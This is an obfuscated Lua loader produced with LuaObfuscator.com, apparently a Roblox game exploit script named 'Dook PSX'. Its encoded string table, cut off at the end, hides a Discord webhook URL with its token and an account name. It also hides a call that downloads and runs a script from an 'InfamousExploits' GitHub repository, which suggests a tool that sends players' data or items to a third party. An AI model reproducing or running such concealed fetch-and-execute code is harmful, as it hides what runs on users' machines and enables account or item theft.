--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v39=0;local v40;while true do if (v39==(1596 -((3795 -2450) + 250))) then return v40;end if (v39==(1102 -(381 + 193 + 528))) then v40=v1(v16,v19,v19);v19=v19 + (1885 -(1848 + 36)) ;v39=1;end end end v23=nil;function v23()local v41,v42=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;return (v42 * (746 -(265 + 225))) + v41 ;end v18=3;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=(v31/((2 + 0)^(v32-(1 + 0))))%(2^(((v33-(1 -0)) -(v32-1)) + ((4 -0) -3))) ;return v69-(v69%(1 -0)) ;else local v70=(2 + 0)^(v32-(2 -1)) ;return (((v31%(v70 + v70))>=v70) and (3 -(4 -2))) or (0 -0) ;end end v22=nil;v18=2;end if (v18==4) then function v25()local v43=v24();local v44=v24();local v45=1723 -(353 + 1369) ;local v46=(v21(v44,1 + 0 ,32 -12 ) * (((1210 -(62 + 1146)) + 0)^(10 + 22))) + v43 ;local v47=v21(v44,29 -(6 + 2) ,754 -(285 + 438) );local v48=((v21(v44,92 -60 )==(1 + 0)) and  -1) or ((1462 -(459 + 1002)) + 0) ;if (v47==((0 + 0) -(782 -(109 + 673)))) then if (v46==0) then return v48 * (0 -0) ;else v47=2 -1 ;v45=0;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * (1/(358 -(75 + 283))))) or (v48 * NaN) ;end return v8(v48,v47-(2174 -(66 + 1 + 1084)) ) * (v45 + (v46/((7 -5)^(98 -46)))) ;end v26=nil;function v26(v34)local v49=0 + 0 ;local v50;local v51;while true do if (v49==(1044 -(601 + 442))) then v50=v3(v16,v19,(v19 + v34) -((3542 -(1605 + 379)) -(1050 + 507)) );v19=v19 + v34 ;v49=2 + 0 ;end if (v49==(0 + (0 -0))) then v50=nil;if  not v34 then v34=v24();if (v34==(0 -0)) then return "";end end v49=1 + 0 ;end if (v49==(1743 -(541 + 1199))) then return v6(v51);end if (v49==(7 -5)) then v51={};for v79=1, #v50 do v51[v79]=v2(v1(v3(v50,v79,v79)));end v49=6 -3 ;end end end v18=5;end if (v18==7) then function v30(v35,v36,v37)local v52=0;local v53;local v54;local v55;while true do if (v52==0) then v53=v35[1];v54=v35[2];v52=1;end if (v52==1) then v55=v35[3];return function(...)local v83=1;local v84= -1;local v85={...};local v86=v12("#",...) -1 ;local function v87()local v88=v53;local v89=v54;local v90=v55;local v91=v28;local v92={};local v93={};local v94={};for v101=905 -(794 + 111) ,v86 do if ((v101>=v90) or (4547<=((743 + 1542) -(94 + 64)))) then v92[v101-v90 ]=v85[v101 + 1 ];else v94[v101]=v85[v101 + (1 -0) ];end end local v95=(v86-v90) + (2 -1) ;local v96;local v97;while true do local v102=0;while true do if ((v102==0) or (153>(3063 -(948 + 684)))) then local v108=0 -(0 -0) ;while true do if (((704 -(548 + 156))==v108) or (((7451 -(222 + 178)) -4287)<862)) then v96=v88[v83];v97=v96[1823 -(1200 + 622) ];v108=2 -1 ;end if ((3081<((4775 -(51 + 185)) -(55 + 1027))) and (v108==(483 -(201 + 281)))) then v102=1;break;end end end if (((12782 -7862)==(5660 -(562 + 178))) and (v102==(1 + 0))) then if (((3889 -(318 + 173))>1477) and (v97<=(4 + 1))) then if (((342 + 152)<=(3285 -1527)) and (v97<=(1929 -((4285 -2974) + 616)))) then if ((v97<=(0 + 0)) or ((4357 -1593)>=(8503 -4710))) then v94[v96[(4 -2) + 0 ]]=v96[1 + 2 ]~=(0 -0) ;elseif ((v97>(1 + 0)) or (((5738 -(211 + 128)) -(197 + 1205))<=(746 -412))) then v94[v96[5 -3 ]][v96[(924 -(346 + 575)) -0 ]]=v96[4];else v83=v96[1145 -(605 + 537) ];end elseif ((3379<(10167 -6270)) and (v97<=3)) then if ((((5554 -(313 + 620)) -1213)>=(1381 + (2473 -(1002 + 209)))) and (v96[4 -(1 + 1) ]==v94[v96[1 + 3 ]])) then v83=v83 + (3 -2) ;else v83=v96[1 + 2 ];end elseif ((v97==(11 -7)) or (4033>(5353 -(388 + 402)))) then local v130=778 -(6 + 772) ;local v131;local v132;local v133;local v134;local v135;while true do if ((v130==(1610 -(1448 + 161))) or ((1500 -(935 + 120))>=(3780 + 148))) then v133=nil;v134=nil;v130=1 + 1 ;end if (((0 -0)==v130) or (3030==(7347 -4627))) then v131=0;v132=nil;v130=1;end if ((v130==(712 -(62 + 648))) or ((2938 -(2614 -(589 + 300)))<=604)) then v135=nil;while true do if (((18556 -14795)>(9610 -7267)) and (v131==(2 -1))) then local v162=1558 -(1156 + (1572 -1170)) ;while true do if ((v162==(3 -(2 + 0))) or ((4207 -(1620 + 246))>(1922 + 1308))) then v131=(2555 -1399) -(94 + 1060) ;break;end if (((0 -0)==v162) or (((3517 -(415 + 674)) -673)==(5186 -((2104 -1661) + 180)))) then v84=(v134 + v132) -(2 -1) ;v135=1000 -(127 + 873) ;v162=1 -0 ;end end end if (((1570 -402)<(2988 -((125 -51) + 1356))) and (v131==2)) then for v172=v132,v84 do local v173=0 -0 ;local v174;local v175;while true do if (((18076 -13906)>(710 + 2806)) and (v173==(1 + 0))) then while true do if (((9208 -(7419 -(916 + 58)))<=(6243 -((2142 -(157 + 1427)) + 835))) and (v174==(0 -0))) then v175=0;while true do if ((((0 -0) -(0 -0))==v175) or (2456>(6763 -3803))) then v135=v135 + 1 + 0 ;v94[v172]=v133[v135];break;end end break;end end break;end if (((4739 -3737)<(8099 -5529)) and (v173==(447 -(218 + 229)))) then v174=0 -0 ;v175=nil;v173=1 + 0 ;end end end break;end if (((9354 -5300)>=((2039 -1089) -(86 + 653))) and (v131==0)) then v132=v96[2];v133,v134=v91(v94[v132](v13(v94,v132 + 1 ,v96[10 -7 ])));v131=1396 -(1229 + (803 -(490 + 147))) ;end end break;end end else local v136=727 -(521 + (686 -480)) ;local v137;local v138;while true do if ((v136==((1 + 0) -0)) or ((5584 -4155)>((473 -250) + 1427))) then while true do if (((0 -0)==v137) or ((3595 -(57 + 135))==(166 + 703))) then v138=v96[5 -3 ];v94[v138]=v94[v138](v13(v94,v138 + 1 + 0 ,v84));break;end end break;end if ((v136==(0 + 0)) or ((2194 -(519 + 106))>(47 + 2966))) then v137=1467 -(267 + 1200) ;v138=nil;v136=1 + 0 ;end end end elseif ((v97<=8) or ((794 + 1441)<=(2971 -(155 + 753)))) then if (((2114 -(618 + 633))<(5168 -(1273 + 87))) and (v97<=(6 + 0))) then do return;end elseif ((v97==7) or (4950<(2975 + 1318 + 249))) then v94[v96[2 -(1680 -(965 + 715)) ]]=v37[v96[2 + 1 ]];elseif (((2626 -1177)>=(3020 -(627 + 971))) and (v94[v96[2 + 0 ]]==v96[1 + 3 + 0 ])) then v83=v83 + (1 -(1622 -(766 + 856))) ;else v83=v96[1489 -(623 + 863) ];end elseif (((4328 -(73 + 613))>=(1643 -(137 + 437))) and (v97<=10)) then if ((v97==((6 -2) + 5)) or ((213 + 66)>4283)) then local v141=0 + 0 ;local v142;local v143;local v144;local v145;while true do if ((v141==0) or (((2049 + 3795) -(1246 + 174))<((3343 -1354) -(34 + 27)))) then v142=0 + 0 + 0 ;v143=nil;v141=(1 -0) + (189 -(103 + 86)) ;end if ((v141==(1425 -(478 + 946))) or (992==(5890 -3899))) then v144=nil;v145=nil;v141=1796 -(1251 + (825 -(10 + 272))) ;end if ((641<=(3157 -((814 -(409 + 286)) + 757))) and (v141==2)) then while true do if ((1398<((204 + 3733) -(112 + (2432 -(6 + 1643))))) and (v142==(3 -2))) then v145=nil;while true do if ((((1 + 0) -0)==v143) or ((5032 -(931 + 640))<712)) then v94[v144 + ((1 + 0) -0) ]=v145;v94[v144]=v145[v96[11 -7 ]];break;end if ((3511<=4521) and (v143==(0 -0))) then local v179=0;local v180;while true do if ((1413<(2533 + 370)) and (v179==(375 -(221 + 154)))) then v180=0 -0 ;while true do if ((1==v180) or ((17501 -13201)<(3964 -(417 + 1275)))) then v143=1;break;end if (((2854 + 853)>=(3460 -(185 + 115))) and (v180==(748 -(333 + (2269 -(390 + 1464)))))) then local v189=0 + 0 ;while true do if ((v189==(597 -(580 + 17))) or ((820 + 318)>((1342 + 868) -(363 + 207)))) then v144=v96[2 + 0 ];v145=v94[v96[11 -8 ]];v189=1;end if (((1555 -(1231 + 232))==92) and (v189==(3 -(1886 -(1200 + 684))))) then v180=1641 -(495 + (2732 -(1449 + 138))) ;break;end end end end break;end end end end break;end if ((v142==0) or ((3240 -(1448 + 300))>(6920 -4149))) then v143=0 + 0 ;v144=nil;v142=2 -(1 + 0) ;end end break;end end else for v148=v96[2 + 0 ],v96[9 -6 ] do v94[v148]=nil;end end elseif ((v97>(20 -9)) or (((14010 -9260) -(876 + (1783 -(201 + 1296))))<(4230 -(1249 + 34)))) then v94[v96[1 + 1 ]]=v96[1847 -(590 + 1254) ];else v94[v96[1 + 0 + 1 ]]();end v83=v83 + (1 -0) ;break;end end end end A,B=v28(v11(v87));if  not A[1] then local v98=v35[4][v83] or "?" ;error("Script error at ["   .. v98   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v38,16));if v20 then local v99=0;local v100;while true do if (v99==0) then v100=v5(v72,v20);v20=nil;v99=1;end if (v99==1) then return v100;end end else return v72;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56=0 + 0 ;local v57;local v58;local v59;local v60;while true do if (v56==(3 -(8 -6))) then return (v60 * (6084813 + 10692403)) + (v59 * (38669 + 26867)) + (v58 * (732 -476)) + v57 ;end if (v56==(383 -(144 + 239))) then v57,v58,v59,v60=v1(v16,v19,v19 + (8 -5) );v19=v19 + 4 ;v56=1 + (0 -0) ;end end end v25=nil;v18=4;end if (6==v18) then v29=nil;function v29()local v61=0;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v61~=1) then else local v76=1921 -(375 + 1546) ;while true do if ((872 -(277 + 595))==v76) then v64=nil;v65=nil;v76=2 -1 ;end if (v76==1) then v61=114 -(39 + 73) ;break;end end end if (v61==0) then local v77=0 -0 ;local v78;while true do if (v77~=0) then else v78=0 -0 ;while true do if (v78==(0 + 0)) then local v103=1734 -(881 + 853) ;while true do if (v103==0) then v62=0;v63=nil;v103=1;end if (v103~=1) then else v78=1 -0 ;break;end end end if (v78==1) then v61=1;break;end end break;end end end if ((2 -0)==v61) then v66=nil;v67=nil;v61=2 + 1 ;end if (v61~=3) then else v68=nil;while true do local v81=458 -(226 + 232) ;local v82;while true do if (0~=v81) then else v82=0;while true do if (v82==(892 -(333 + 558))) then if (v62~=2) then else local v109=0 + 0 ;local v110;local v111;while true do if (v109~=(2 -1)) then else while true do if (v110==0) then v111=947 -(537 + 410) ;while true do if ((0 -0)==v111) then local v151=0 -0 ;while true do if (v151==(1210 -(496 + 714))) then for v166=1 -0 ,v67 do local v167=0 + 0 ;local v168;local v169;local v170;local v171;while true do if (v167==(772 -(193 + 577))) then while true do if (v168==(1 + 0)) then v171=nil;while true do if (v169~=(2 -1)) then else if (v170==1) then v171=v22()~=(0 + 0) ;elseif (v170==(1 + 1)) then v171=v25();elseif (v170~=(1943 -(786 + 1154))) then else v171=v26();end v68[v166]=v171;break;end if (0==v169) then local v191=0 + 0 ;while true do if (v191==(3 -2)) then v169=1 + 0 ;break;end if ((0 -0)~=v191) then else local v200=0;while true do if (v200~=1) then else v191=1;break;end if (0~=v200) then else v170=v22();v171=nil;v200=2 -1 ;end end end end end end break;end if (v168==(672 -(585 + 87))) then local v183=0;while true do if (v183~=(0 -0)) then else v169=0 -0 ;v170=nil;v183=1;end if (v183==(3 -2)) then v168=1;break;end end end end break;end if (v167==1) then v170=nil;v171=nil;v167=2 + 0 ;end if (v167==(772 -(634 + 138))) then v168=0 -0 ;v169=nil;v167=421 -(403 + 17) ;end end end v66[475 -(339 + 133) ]=v22();v151=508 -(428 + 79) ;end if (v151~=(1 + 0)) then else v111=2 -1 ;break;end end end if (v111==1) then for v154=1 + 0 ,v24() do local v155=0 + 0 ;local v156;local v157;local v158;while true do if (v155==(2 -1)) then v158=nil;while true do if (v156==0) then local v181=0 -0 ;while true do if (v181==1) then v156=1;break;end if (v181~=0) then else v157=333 -(189 + 144) ;v158=nil;v181=1 -0 ;end end end if (v156==1) then while true do if (v157~=(0 -0)) then else v158=v22();if (v21(v158,505 -(426 + 78) ,1)==(0 + 0)) then local v184=0;local v185;local v186;local v187;local v188;while true do if (v184==0) then v185=0;v186=nil;v184=1;end if (2==v184) then while true do if ((1338 -(1181 + 154))==v185) then if (v21(v187,169 -(11 + 155) ,3)==(172 -(23 + 148))) then v188[4]=v68[v188[3 + 1 ]];end v63[v154]=v188;break;end if (v185==(1 + 1)) then local v202=0 -0 ;while true do if (v202==(0 + 0)) then if (v21(v187,2 -1 ,1)~=1) then else v188[2]=v68[v188[784 -(380 + 402) ]];end if (v21(v187,372 -(86 + 284) ,2)==1) then v188[10 -7 ]=v68[v188[3]];end v202=1425 -(515 + 909) ;end if (v202~=1) then else v185=3;break;end end end if (v185==0) then v186=v21(v158,1 + 1 ,3);v187=v21(v158,9 -5 ,6);v185=1 + 0 ;end if (v185==1) then v188={v23(),v23(),nil,nil};if (v186==0) then local v205=168 -(124 + 44) ;local v206;local v207;while true do if (v205==0) then v206=0;v207=nil;v205=1 + 0 ;end if (v205==1) then while true do if (v206~=0) then else v207=0 -0 ;while true do if (v207==0) then v188[2 + 1 ]=v23();v188[1703 -(435 + 1264) ]=v23();break;end end break;end end break;end end elseif (v186==1) then v188[3 + 0 ]=v24();elseif (v186==2) then v188[3]=v24() -(2^16) ;elseif (v186~=(1933 -(667 + 1263))) then else local v214=0 -0 ;local v215;while true do if (v214==0) then v215=0 + 0 ;while true do if (v215==0) then v188[8 -5 ]=v24() -(2^16) ;v188[4]=v23();break;end end break;end end end v185=1 + 1 ;end end break;end if (v184==(1 + 0)) then v187=nil;v188=nil;v184=2;end end end break;end end break;end end break;end if ((0 -0)==v155) then v156=0 + 0 ;v157=nil;v155=3 -2 ;end end end v62=3;break;end end break;end end break;end if (v109==0) then v110=0;v111=nil;v109=1 -0 ;end end end if (1~=v62) then else local v112=0 + 0 ;local v113;local v114;while true do if (v112==(0 + 0)) then v113=0;v114=nil;v112=1;end if (v112==1) then while true do if (v113==0) then v114=0;while true do if (v114==0) then local v152=1410 -(628 + 782) ;local v153;while true do if (v152==(1486 -(444 + 1042))) then v153=0;while true do if (v153~=(1 + 0)) then else v114=1739 -(1478 + 260) ;break;end if (v153==(1738 -(662 + 1076))) then v66={v63,v64,nil,v65};v67=v24();v153=1 + 0 ;end end break;end end end if (v114~=(1 + 0)) then else v68={};v62=998 -(541 + 455) ;break;end end break;end end break;end end end break;end if (v82~=(1140 -(1052 + 88))) then else if (v62==0) then local v115=0;local v116;while true do if (v115==(0 -0)) then v116=0 + 0 ;while true do if (v116~=1) then else v65={};v62=1;break;end if (v116==0) then local v124=0 -0 ;local v125;while true do if (v124==(1901 -(1038 + 863))) then v125=0 -0 ;while true do if (v125~=(1 + 0)) then else v116=1 + 0 ;break;end if ((572 -(35 + 537))==v125) then v63={};v64={};v125=1;end end break;end end end end break;end end end if (v62~=(14 -11)) then else local v117=0;local v118;while true do if (v117==(460 -(166 + 294))) then v118=0 -0 ;while true do local v121=0;local v122;while true do if (v121==(0 -0)) then v122=450 -(32 + 418) ;while true do if (v122~=0) then else if (0==v118) then local v160=0;local v161;while true do if (v160==(0 + 0)) then v161=0 -0 ;while true do if (v161~=0) then else local v182=630 -(416 + 214) ;while true do if (0==v182) then for v192=1,v24() do v64[v192-(828 -(86 + 741)) ]=v29();end for v194=1,v24() do v65[v194]=v24();end v182=1;end if (v182==1) then v161=127 -(104 + 22) ;break;end end end if (v161~=(1988 -(273 + 1714))) then else v118=3 -2 ;break;end end break;end end end if (v118==1) then return v66;end break;end end break;end end end break;end end end v82=1327 -(272 + 1054) ;end end break;end end end break;end end end v30=nil;v18=7;end end end v15("LOL!0D3O00028O0003023O005F4703073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F31302O3937313932343034392O33302O3937342F766D304F543745724A476F516334774A464E62586C666C4236304D5F4D646B713547633254346D49384872543444364F4150664459712O596137584C784376683637754E03083O00557365726E616D6503093O007073785F616C743738026O00F03F030A3O005363726970744E616D6503083O00442O6F6B20505358030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F496E66616D6F75734578706C6F6974732F496E66616D6F75734F6E546F702F6D61696E2F4E65772E6C7561001D3O00120C3O00014O000A000100013O0026083O0002000100010004013O0002000100120C000100013O000E030001000C000100010004013O000C0001001207000200023O003002000200030004001207000200023O00300200020005000600120C000100073O00260800010
